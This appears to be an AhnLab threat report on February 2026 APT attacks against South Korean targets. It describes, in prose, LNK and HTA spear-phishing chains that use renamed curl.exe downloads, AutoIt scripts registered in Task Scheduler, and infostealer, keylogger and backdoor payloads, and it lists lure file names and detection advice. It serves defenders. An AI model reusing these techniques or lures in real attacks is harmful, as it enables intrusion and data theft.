February 2026 APT Attack Trends Report (South Korea)
Overview.
ahnLab monitored APT attacks against domestic targets during the month of February 2026 through its infrastructure.
this report summarizes the classification, statistics, and features of each type of domestic APT attacks identified during the period.
APT Domestic Attack Trends.
we found that most of the infiltrations were carried out through spear phishing emails.
in particular, attacks using LNK files were the most common, and some CHM file-based attacks were also identified.
LNK-based attacks can be categorized into two types: Type A and Type B.
Type A is a PowerShell Command included in LNK execution that connects to an external URL and downloads additional files.
in this process, curl.exe is copied and executed with a different file name, and a legitimate AutoIt executable and a malicious AutoIt script are downloaded and registered in the Task Scheduler to ensure persistence.
the malicious AutoIt script performs command execution, directory lookup, and file upload/download functions.
Type B utilizes the Windows default curl.exe to download and execute the malicious HTA file at %TEMP%.
the malicious HTA is distributed from the threat actor’s GitHub repository or Google Drive and creates a downloader to load Infostealer, a keylogger, and a memory-based backdoor that leaks system information, key file lists, and cryptocurrency-related information.
examples of confirmed malicious file names include “NTSRefund account registration and confirmation guide.html.lnk,” “password.txt.lnk,” and “refundinquiry.pdf.lnk.”
AhnLab Response Status.
ahnLab monitored the activity with its infrastructure and collected cases.
a detailed sample and file name list is attached to the report to provide the basis for analysis.
Conclusion.
the analysis shows that this APT attack has a typical flow of initial infiltration through spear phishing, downloading malicious modules from external hosts, persistence based on Task Scheduler, information exfiltration, and remote control.
from an organizational perspective, attention should be paid to the handling of email-based malicious attachments and LNK/HTA files.
it is important to detect abnormal cloning and execution of curl.exe, monitor suspicious registrations in Task Scheduler, and detect signs of Infostealer and keyloggers.
detailed IOCs and sample information are included in the report’s attachments.
